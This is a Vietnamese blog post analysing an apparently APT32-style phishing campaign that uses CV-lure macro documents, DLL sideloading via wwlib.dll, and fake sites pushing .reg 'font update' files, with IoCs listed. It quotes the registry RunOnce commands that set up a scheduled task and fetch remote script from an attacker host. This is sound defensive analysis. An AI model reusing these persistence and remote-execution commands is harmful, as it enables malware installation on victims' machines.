Bài viết được lấy từ Medium của LangTuBongDem xin chân thành cảm ơn tác giả
Ngày cuối thu Hà Nội trong tiết trời se lạnh lại có phần ấm áp dễ chịu của chút nắng thu, ngồi vẩn vơ miên man theo những dòng suy nghĩ về xã hội đầy rẫy những cạm bẫy của cuộc sống. Nơi mà tôi và anh em mỗi ngày đều phải đề phòng mọi thứ, có khi là ngay cả những người xung quanh mình. Có người anh của tôi từng bảo cuộc sống này thì phải luôn luôn là “Trust but Verify”. Đấy ngay như anh bạn đồng nghiệp ngồi cạnh tôi, đi ra ngoài không lock máy, bụng chắc mẩm toàn anh em cả chắc không sao, thế éo nào về cái anh em ra cảm ơn rối rít vì mail mời chè cả phòng của ông ấy. Đắng! Tóm lại là chả tin bố con thằng nào cả, cái gì cũng phải cẩn thận và VERIFY anh em ạ! Cuộc sống mà :))
1 message gửi từ facebook messenger từ anh bạn xã hội của tôi, bảo đã gửi cho tôi qua email một vài thông tin khá hot. Qua phân tích sâu, tôi biết thêm nhiều thứ khá hay ho về một chiến dịch APT lớn được tổ chức rất bài bản nhắm vào các tổ chức ở Việt Nam thời gian gần đây. Muốn chia sẻ để mọi người nắm được kỹ thuật mà attacker sử dụng để anh em có thể so sánh với một vài cuộc tấn công khác xem có điểm chung không. Bài viết hơi dài, lời lẽ không được chau chuốt cũng như những kỹ thuật phân tích mã độc ở dạng low của tôi nên anh em thông cảm nhẹ tay gạch đá nhé.
Phần 1: Email Phishing của attacker và những kỹ thuật cơ bản
Email anh bạn xã hội gửi cho tôi có tiêu đề “Apply CV at … — Nguyen Minh Duc” được gửi từ địa chỉ minhduc90.ng@gmail.com
Với nội dung kiểu: Tôi đọc được thông tin tuyển dụng ở trên Facebook và cảm thấy tôi đỉnh kout trong lĩnh vực này nên nộp CV 🙂
Tôi chụp lại 1 đoạn email thôi chứ thực chất luồng email là cả 1 quá trình mồi chài người dùng và dẫn dắt đến việc download file CV-ducnguyenminh.doc về(MD5: CB39E2138AF92C32E53C97C0AA590D48) theo url: https://mycv[.]vip/downloads/cv-ducnguyenminh.doc.
File doc được download về thuộc dạng MIME DOC, trong bụng nó có chứa 1 thằng ActiveMime (ở đây chính là thằng editdata.mso — trong file MIME DOC nó được encode bằng Base64). Gặp định dạng maldoc kiểu này anh em cứ kéo thẳng xuống cuối để xem FileList xem có thằng mso nào không 🙂
Tôi dump đoạn editdata.mso ra và decode nó với Base64 để có ActiveMime object. Đối với ActiveMime thì đơn giản là ta dùng zlib-compressed data ở offset 0x32 (cái này là theo cấu trúc của ActiveMime).
Chạy đoạn code python nhỏ trên thu được file OleObject, OleObject này chứa Macro bên trong. Macro có nhiệm vụ giải mã Base64 để dump ra 2 file WinwordUpdates.exe và wwlib.dll vào thư mục Appdata và tạo taskjob để thực thi file WinwordUpdates.exe:
Để dump 02 files này ra ta có 2 cách:
- Cách 1: Mở file doc lên và Run code Macro trong file doc lên rồi vào thư mục Appdata để lấy file -> Hơi thủ công (Tất nhiên là nên chạy trong máy ảo)
- Cách 2: Tìm kiếm String “TVqQAAMAAAAEAAAA” trong file MIME DOC (sẽ tìm được 2 đoạn chính là 2 đoạn encoded base64 của 2 file này) rồi copy đoạn Base64 mang ra decode -> Cách này có tí đầu óc :))
Phân tích 2 file dump:
WinwordUpdates.exe — CEAA5817A65E914AA178B28F12359A46: File có chữ ký của Microsoft
wwlib.dll — 8CCFD46A24D3BCBEE934AF91DDA8483D: File mã độc, trùng với tên file chuẩn được mặc định load lên khi WinwordUpdates.exe thực thi.
File wwlib.dll độc hại được load lên bởi file WinwordUpdates.exe bằng hàm LoadLibraryW rồi gọi hàm export FMain:
Việc phân tích file wwlib.dll tôi không đi quá sâu vì kỹ thuật tuy hơi loằng ngoằng chút nhưng sau 1 vài breakpoints tôi cũng đến được chỗ cần đến:
Tại thời điểm phân tích thì tôi không download file vean32.png được nữa. C&C này chắc anh em nhìn cũng quen vì thấy trên Kiểm tra thử với virustotal thì cũng thấy khá nhiều thứ đặt trên C&C này:
C&C: outlook[.]updateoffices[.]net — 88[.]150[.]138[.]114
Kết thúc phần 1: Có thể nhiều anh em thấy chưa có gì hấp dẫn lắm, một phần chắc với trình độ cao siêu hơn nên thấy bình thường hoặc có thể nghĩ đây cũng chỉ là 1 mẫu APT như bao mẫu khác. Anh em nếu hứng thú thì tiếp tục với phần 2 nhé 😀
IoCs:
C&C:
- outlook[.]updateoffices[.]net
- 88[.]150[.]138[.]114
- https://outlook[.]updateoffices[.]net/vean32[.]png
MD5 Hash:
- WinwordUpdates.exe — CEAA5817A65E914AA178B28F12359A46
- wwlib.dll — 8CCFD46A24D3BCBEE934AF91DDA8483D
- CV-ducnguyenminh.doc — CB39E2138AF92C32E53C97C0AA590D48
Trong cuộc sống, có những thứ ta cứ tìm hoài đâu đâu mà không biết rằng nó ở ngay bên cạnh mình, để rồi đến lúc nhận ra lại quá muộn màng vì nó tuột khỏi tầm tay của mình mất rồi 🙁
Anh và em, chúng ta như 2 đường thẳng song song lúc nào cũng nhìn thấy nhau những chẳng bao giờ gặp nhau cả! Giống tôi và attacker vậy, nhiều lần tôi và attacker cùng thao tác trên máy victim nhưng thực sự tôi và anh ấy mãi mãi không bao giờ gặp nhau 🙁
Phần 2: Domain lạ và những trò mèo của Attacker
Ở Phần 1 tôi đã phân tích 1 mẫu APT được download từ url đính kèm trong email, ở phần 2 này tôi sẽ tiếp tục đi sâu hơn về thông tin của attacker. Thường thì url để download APT được gửi qua email trong rất nhiều case tôi gặp nó là url có host phổ biến dành để upload và chia sẻ file hoặc googledrive, còn để ý kỹ hơn về url này: https://mycv[.]vip/downloads/cv-ducnguyenminh.doc tôi thấy mycv[.]vip không chỉ đơn thuần là 1 host để mọi người lên upload file như bình thường.
-
Domain lạ 🙂
Xem kỹ nào: mycv[.]vip — 110[.]34[.]166[.]15(Nghe quen quen giống với mycv.com) thực chất đây là domain fake — chính là địa chỉ máy chủ của attacker.
Thử lookup tiếp xem IP này được domain nào trỏ đến 🙂
Mọi thứ dường như quá mới mẻ nhỉ:
vtv-news[.]net: 2019–01–05 (Thực chất thằng này có từ 2018–09 cơ 😀 bây giờ nó lôi ra dùng lại thôi)
mycv[.]vip: 2018–09–27
Domain này được tạo ngày 08/08/2018, sau Phần 1 có lẽ nhiều anh em thi nhau truy cập vào domain này nhưng tiếc là hiện tại tôi nghĩ là attacker đã suspend web trên host hoặc khả năng attacker đã filter việc truy cập vào domain này :)). Ơn giời nhờ ăn ở tốt, thời điểm tôi truy cập vào và tìm kiếm thông tin thì nó vẫn hoạt động :
Truy cập thử mycv[.]vip xem nào:
Nhìn qua giao diện có vẻ như bị lỗi font và popup ra 1 thông báo The “Sans-serif” font not found -> Trang web yêu cầu người dùng update font để có thể view được nội dung trang web. Không khó để nhận biết thứ mà trang web muốn chúng ta tải về là cái gì: https[:]//download-attachments.s3.amazonaws[.]com/6dfa5b468f383a147c5be7905dc833bd16aeb68e/ffd856a2-b0e5–4c7f-9960–2b7a6ec4e9d5
File được download về là file updateChrome.reg có nội dung như hình dưới:
Khi người dùng chạy file .reg lên key RunOnce được tạo ra để thực thi 1 lần với nội dung:
“1”=”forfiles /P C:\\wInDoWs /M ExpL*.exe /C \”cmd /c \\\” SchTaSkS /Create /TN \\\”CTF Loader\\\” /SC MINUTE /MO 8 /F /TR \\\”’%progRAMData%\\ctfmon.exe’ //nologo //e:vbscript ‘%PrOgraMData%\\ctfmon.config’\\\”” -> Tạo taskjob để chạy %programdata%\\ctfmon.exe load file ctfmon.config cùng thư mục
“2”=”forfiles /P C:\\WIndoWs /M eXpl*.exe /C \”cmd /c \\\” copy \”%wIndIR%\\SYStem32\\wscript.exe\” \”%programdata%\\ctfmon.exe\”” -> Copy wscript.exe chuẩn của windows vào thư mục %programdata%\\ctfmon.exe chính là file ctfmon.exe được thực thi bởi taskjob
“3”=”forfiles /P c:\\wINdoWS /M exPl*.exe /C \”cmd /c \\\” echo On Error Resume Next>\”%progRAmdATA%\\ctfmon.config\” & echo GetObject(\\\”script:https://open.betaoffice.net/deko.png\\\“\\\”)>>\”%PrOgRAmDAta%\\ctfmon.config\”” -> Connect tới C&C download file deko.png về thư mục %programdata%\\ctfmon.config chính là file config để ctfmon.exe load lên
Cái Url này https://open[.]betaoffice[.]net/deko.png lúc tôi download thử thì nó out of date rồi nhưng cơ bản cũng có thể đoán được nó là kênh backdoor để nhận lệnh điều khiển từ C&C, nhìn C&C open.betaoffice.net có quen không các bạn :). Cái C&C này tôi nhớ không nhầm thì hình như có trong 1 post nào trên Facebook của anh Kiên M4n0w4r thì phải.
Tiếp tục nào, tò mò muốn xem cái CV kia mà ko fix được font chữ :))) thế thì tải thử CV ở chỗ góc phải màn hình về xem thôi:
Url: https://mycv[.]vip/downloads/CV-198756-DBEGWQ.doc
2. Phân tích file CV-198756-DBEGWQ.doc
File doc nhận được lại là 1 file MimeDoc. OK, tôi tiếp tục thực hiện việc dump file editdata.mso để lấy ActiveMime Object.
Kịch bản lại như phần 1:
- Dùng mấy câu lệnh python để decompress ActiveMime Object ta có được OleObject file.
- Dung olevba để extract code VBA Macro độc hại từ OleObject file
Đến đoạn này thì tôi thấy giống hệt cách thức của mẫu APT mà anh Kiên m4n0w4r từng phân tích rất hay trước đó (https://tradahacking.vn/ph%C3%A2n-t%C3%ADch-nhanh-m%E1%BB%99t-sample-c20da639e768) nên tôi sẽ không trình bày lại cách phân tích nữa, anh em có thể tham khảo sử dụng cách phân tích tương tự như bài viết của a Kiên :D, Code VBA Macro thực hiện những nhiệm vụ sau:
- Decode Base64 đoạn dữ liệu ra file mã độc dưới tên msohtml.log ở thư mục %temp%
- Copy file wscript.exe chuẩn vào cùng thư mục với file msohtml.log với tên msohtml.exe
- Tạo key và taskjob để thực hiện nhiệm vụ thực thi mã độc
Với file msohtml.log, qua 2 lần decode tôi có được C&C:
Ở Phần 1 C&C tôi tìm được là: outlook[.]updateoffices[.]net còn ở đây là open[.]betaoffice[.]net. Anh em nhìn những domain này quen không??? Rất quen nhé, xin trích dẫn post cảnh báo được chia sẻ trên Facebook của a Kiên https://www.facebook.com/m4n0w4r/posts/2219120271433800.
Hừm có vẻ như chiến dịch APT này được dựng nên không chỉ nhắm vào 1 tổ chức mà nhiều tổ chức ở Việt Nam anh em ạ 🙁
Tiếp tục xem chiến dịch APT này gồm những gì nhé 🙂
3. Đống mèo què của attacker
Vậy là xử lý xong những gì chúng ta nhìn thấy nhưng tôi lại muốn tiếp tục đào sâu hơn vào cái web này xem có gì thú vị.
Một số url chúng ta thấy:
https://mycv[.]vip/downloads/cv-ducnguyenminh.doc
https://mycv[.]vip/downloads/CV-198756-DBEGWQ.doc
Thế thì vào thử thư mục downloads xem nào :)))
Theo đường dẫn /downloads, gồm có:
- Một số CV được tạo sẵn chắc là để phục vụ cho việc gửi email Phishing. Trong đó có CV-DucNguyenMinh.doc và CV-198756-DBEGWQ.doc tôi đã phân tích trước đó
- Các file .reg tương tự như file updateChrome.reg ở trên, có lẽ nó sẽ tương ứng với mỗi trình duyệt mà bạn sử dụng
- Thư mục windows — Last modified 2018–07–05, thư mục này chứa 3 bộ files tương ứng với Chome, IE và Fonts:
- Thư mục mac — Last modified 2018–07–05, thư mục này chứa 3 files install tương ứng với Firefox, Google Chrome và Fonts:
Có nhiều thứ để phân tích và bơi rồi 😀
Khoan động đến việc phân tích kĩ các mẫu này, tôi mới chỉ xem qua và nhận thấy các bộ mẫu này phong cách code rất giống với phong cách trong nhiều bài viết phân tích về APT32 (OceanLotus).
By the way, nhắc đến phân tích mẫu, cảm ơn thằng em xã hội hoangcuongflp (YzBuY2gw) đã đồng hành hỗ trợ tôi phân tích 1 số mẫu trong đống này. Đợt đó tôi còn dính đi hỗ trợ xlsc cho 1 bên khác nên bận bù lu luôn :))).
Tiếp tục với những thứ tôi tìm được, đến đây có thể nhiều anh em nghĩ rằng đống mẫu kia attacker đơn giản là vứt lên khi nào cần dùng thì gửi link đến victim để download thôi :D. Nhưng phân tích kỹ hơn, tôi thử download source của mycv.vip về kiểm tra (Ctrl + S hoặc chuột phải View page source thôi anh em :D)
Ngoài code html để fake 1 cái giao diện web ra, còn có javascript để xử lý:
Ngoài ra, attacker còn sử dụng thêm 1 script nữa (https://mycv.vip/scripts/scripts.js) để target tới nhiều nền tảng khác nhau:
Đối với trình duyệt thì có: Chrome, Firefox, IE, Edge, Opera. Mobile thì có Ipad, Iphone, Android. OS thì có Windows, MacOS :)) Đầy đủ cả mẫu tương ứng với mỗi nền tảng 🙂
Thực sự là rất bài bản và mang tính chất chiến dịch 🙂
Tôi xem tiếp cái domain thứ 2: vtv-news.net. Về cơ bản là attacker clone giao diện của trang này (https://vtv.vn) và cách thức hoạt động tương tự như mycv.vip:
Ở vtv-news.net thì attacker tử tế hơn còn để lại cả bộ source code để đỡ phải download thủ công:
Thư mục windows, mac cũng có các file tương tự như trên mycv.vip:
Kết thúc phần 2: Cơ bản là những gì mà attacker có cho chiến dịch APT này tôi đã show cho anh em thấy, tôi nghĩ anh em nên add 2 cái domains (mycv.vip và vtv-news.net) vào blacklist và truy vấn thử xem trong tổ chức, cơ quan mình từ năm ngoái đến giờ có gì không nhé :)).
Phần sau là phần cuối cùng sẽ là bài viết chi tiết về từng sample tôi thu thập được từ vụ này và đống IoCs của attacker, nếu có hứng thú anh em tiếp tục follow nhé 🙂
Bài hay nên đọc
Cách xử lí khi máy ảo Vmware bị mất mạng khi để chế độ Bridged
Cách nâng cấp (Upgrade) Ubuntu lên phiên bản mới
Lựa chọn Distro nào để bắt đầu tiếp cận với Linux?
Views: 975